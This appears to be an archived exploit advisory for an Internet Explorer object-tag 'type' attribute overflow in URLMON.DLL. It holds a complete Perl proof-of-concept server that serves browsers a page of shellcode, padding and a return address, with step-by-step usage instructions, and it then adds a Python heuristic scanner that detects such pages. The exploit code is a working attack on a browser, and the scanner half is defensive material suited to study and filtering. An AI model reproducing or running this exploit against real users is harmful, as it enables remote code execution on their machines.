IE-object tag longtype exploit

2003-06-09 00:00:00

vulners.com

```perl
#!/usr/bin/perl
#=synopsis
#
#   06/06/03 - Proof of concept exploit by Sir Alumni ([email protected])
#
#   IE-Object longtype dynamic call overflow
#
#   […]
#
#   url://<$shellcode><'/'x48><jmp %ptr_sh>
#
#   The flaw actually exists in URLMON.DLL when converting backslashes
#   to wide char; this can be seen on a stack dump near '&CLSID=AAA…2F__2F__…'.
#
#   […]
#
#   To exploit: i)  start the server perl script;
#               ii) connect to the http service using IE/5.x.
#
#   Tested: IE-5.x, 6.0? on WinXP.
#
#   Note: a) the shellcode size is limited to 56 bytes;
#         b) the '$ret' may differ, as well as the image base of KERNEL32.DLL;
#         c) to avoid multiple encoding the shellcode is given 'as is'
#            with the help of JScript.
#=synopsis

use IO::Socket;

$port = 80;

$server = IO::Socket::INET->new (LocalPort => $port,
                                 Type      => SOCK_STREAM,
                                 Reuse     => 1,
                                 Listen    => $port) or die("Couldn't create server socket\n");

$shellcode = "\x33\xdb".                 # xor ebx, ebx
             "\x8b\xd4".                 # mov edx, esp
             "\x80\xc6\xff".             # add dh, 0xFF
             "\xc7\x42\xfc\x63\x6d".     # mov dword ptr[edx-4], 0x01646D63 ("cmd\x01")
             "\x64\x01".                 #
             "\x88\x5a\xff".             # mov byte ptr[edx-1], bl
             "\x8d\x42\xfc".             # lea eax, [edx-4]
             "\x8b\xf5".                 # mov esi, ebp
             "\x56\x52".                 # push esi; push edx
             "\x53\x53\x53\x53\x53\x53". # push ebx
             "\x50\x53".                 # push eax; push ebx
             "\xb8\x41\x77\xf7\xbf".     # mov eax, 0xBFF77741 ~= CreateProcessA
             "\xff\xd0".                 # call eax
             "\xb8\xf8\xd4\xf8\xbf".     # mov eax, 0xBFF8D4F8 ~= ExitProcess
             "\xff\xd0".                 # call eax
             "\xcc";                     # int 3

$nop = "\x90";

$ret = "\\xAB\\x5D\\x58";

while ($client = $server->accept()) {
    while (<$client>) {
        if ($_ =~ /^(\x0D\x0A)/) {
            print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
<script>\r
    var mins = 56;\r
    var size = 48;\r
    var sploit = "$shellcode";\r
    var strNop = "$nop";\r
    var strObj = '<object type="';\r
    for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
    strObj += sploit;\r
    for (i=0;i<size;i++) strObj += '/';\r
    strObj += "CCCCCCCCDDDDDDDD";\r
    strObj += "$ret";\r
    strObj += '">Hello</object>';\r
    alert(strObj);\r
    document.write(strObj);\r
</script>\r
END_DATA
            close($client);
        }
    }
}

close($server);
```
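The PoC above relies on an `<object>` tag whose `type` attribute is not a MIME type at all but padding, a run of slashes and a return address, assembled at runtime by script and written into the document. A content-inspection heuristic on a proxy or mail gateway can flag both shapes: a literal `<object type="…">` whose attribute value is oversize or not MIME-shaped, and a script block that builds an `<object type="` string and hands it to `document.write`. The following scanner is an added example written for this page, not code from the advisory or from vulners.com; the length limit, the MIME grammar, the sample documents and all function names are constructed assumptions, and the real fix for the flaw is the vendor patch for URLMON.DLL, not this filter.

```python
import re
from typing import Dict, List, Optional

# Constructed thresholds and patterns for this example (heuristics, not advisory values).
MAX_TYPE_LEN = 64                       # genuine MIME types are far shorter than this
MIME_TOKEN = r"[A-Za-z0-9!#$&^_.+-]+"
MIME_RE = re.compile(rf"^{MIME_TOKEN}/{MIME_TOKEN}$")

# <object ... type="..."> with either quote style; DOTALL so embedded newlines don't stop it
OBJECT_TYPE_RE = re.compile(
    r"<object\b[^>]*?\btype\s*=\s*([\"'])(.*?)\1", re.IGNORECASE | re.DOTALL
)
# <script> bodies, scanned separately for tags that are assembled at runtime
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# a JS string literal opening an <object type=" attribute, the building block the PoC uses
OBJECT_STRING_LITERAL_RE = re.compile(r"""['"]<object\s+type=['"]""", re.IGNORECASE)


def classify_type_value(value: str) -> Optional[str]:
    """Return a reason if an <object> 'type' value looks like overflow padding
    rather than a MIME type, otherwise None."""
    if len(value) > MAX_TYPE_LEN:
        return f"type attribute is {len(value)} chars (limit {MAX_TYPE_LEN})"
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in value):
        return "type attribute contains non-printable bytes"
    if "//" in value or "\\\\" in value:
        return "type attribute contains repeated path separators"
    if not MIME_RE.fullmatch(value):
        return "type attribute is not a well-formed MIME type"
    return None


def scan_html(html: str) -> List[Dict[str, str]]:
    """Flag static <object> tags with suspicious 'type' values and scripts that
    assemble such a tag and write it into the document."""
    findings: List[Dict[str, str]] = []
    # Static tags: look at the markup with script bodies removed, so string
    # literals inside scripts are not mistaken for real attributes.
    markup_only = SCRIPT_RE.sub("", html)
    for m in OBJECT_TYPE_RE.finditer(markup_only):
        reason = classify_type_value(m.group(2))
        if reason:
            findings.append({"kind": "static_object", "reason": reason})
    # Runtime-built tags: a script that holds the '<object type="' fragment and
    # calls document.write is the pattern the PoC page uses.
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if OBJECT_STRING_LITERAL_RE.search(body) and "document.write" in body:
            findings.append({
                "kind": "script_built_object",
                "reason": "script assembles an <object type=...> string and writes it to the document",
            })
    return findings


# Constructed sample documents (no shellcode; padding bytes stand in for it).
BENIGN = '<object type="application/x-shockwave-flash" data="movie.swf">fallback</object>'
STATIC_OVERFLOW = (
    '<object type="' + "\x90" * 56 + "/" * 48 + "CCCCCCCCDDDDDDDD" + '">Hello</object>'
)
SCRIPT_BUILT = (
    "<script>\n"
    "var strObj = '<object type=\"';\n"
    "for (i = 0; i < 48; i++) strObj += '/';\n"
    "strObj += '\">Hello</object>';\n"
    "document.write(strObj);\n"
    "</script>"
)

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("static", STATIC_OVERFLOW), ("script", SCRIPT_BUILT)):
        print(name, scan_html(doc))
```

The two checks are deliberately independent: the static check catches a page that ships the malformed tag verbatim, while the script check catches the PoC's construction style, in which the served HTML contains no `<object>` tag at all until the script runs. Tune `MAX_TYPE_LEN` to the longest `type` value seen in legitimate traffic before deploying the heuristic inline.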